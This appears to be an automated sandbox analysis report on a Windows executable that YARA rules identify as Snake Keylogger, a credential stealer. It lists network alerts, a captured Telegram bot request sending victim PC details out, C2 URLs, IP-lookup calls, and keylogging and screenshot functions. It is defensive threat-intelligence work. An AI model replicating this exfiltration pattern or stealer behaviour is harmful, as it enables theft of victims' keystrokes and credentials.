Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_06C90040
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C9FAB9h	5_2_06C9F810
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C9DC51h	5_2_06C9D9A8
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 4x nop then jmp 06C931E0h	5_2_06C9310E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.11:49721 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:00:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49709 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49706 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49699 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49704 -> 104.21.96.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49700 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49710 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:00:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 20:08:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: svchost.exe, 00000006.00000002.2850458467.0000017E6D600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000031A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000031A9000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000031A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000031A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20a
Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003255000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003250000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000006.00000003.1203129421.0000017E6D440000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000031A9000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003180000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.000000000313B000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000031A9000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003180000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003286000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003277000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49721 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, COVID19.cs

.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 3GrfjMY0pG.exe, HookManager.cs	.Net Code: EnsureSubscribedToGlobalKeyboardEvents
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 0_2_0E918EF8 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,		0_2_0E918EF8
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 0_2_0E918F08 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,		0_2_0E918F08

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 3GrfjMY0pG.exe PID: 6092, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 0_2_01623E0C	0_2_01623E0C
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 0_2_01627390	0_2_01627390
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 0_2_0E91D770	0_2_0E91D770
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 0_2_0E911C90	0_2_0E911C90
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 0_2_0E915AC0	0_2_0E915AC0
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 0_2_0E911C90	0_2_0E911C90
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 0_2_0E912910	0_2_0E912910
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 0_2_0E915AC0	0_2_0E915AC0
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 0_2_0E929FB0	0_2_0E929FB0
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 0_2_0E9222C8	0_2_0E9222C8
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_0147C147	5_2_0147C147
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_01475362	5_2_01475362
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_0147D278	5_2_0147D278
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_0147C468	5_2_0147C468
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_0147C738	5_2_0147C738
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_0147E988	5_2_0147E988
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_014769A0	5_2_014769A0
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_0147CA08	5_2_0147CA08
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_01479DE0	5_2_01479DE0
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_0147CCD8	5_2_0147CCD8
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_01476FC8	5_2_01476FC8
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_0147CFA9	5_2_0147CFA9
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_0147F631	5_2_0147F631
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_0147E97C	5_2_0147E97C
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_014729EC	5_2_014729EC
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_0147FA88	5_2_0147FA88
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_01473AA1	5_2_01473AA1
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_01473E09	5_2_01473E09
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C91E80	5_2_06C91E80
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9E6B0	5_2_06C9E6B0
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C917A0	5_2_06C917A0
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C99C18	5_2_06C99C18
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C99548	5_2_06C99548
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C90B30	5_2_06C90B30
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C95028	5_2_06C95028
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C92968	5_2_06C92968
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9E6AF	5_2_06C9E6AF
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C91E70	5_2_06C91E70
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9DE00	5_2_06C9DE00
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9178F	5_2_06C9178F
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9EF51	5_2_06C9EF51
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9EF60	5_2_06C9EF60
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9CC8F	5_2_06C9CC8F
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9CCA0	5_2_06C9CCA0
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9DDFF	5_2_06C9DDFF
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9D540	5_2_06C9D540
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9D550	5_2_06C9D550
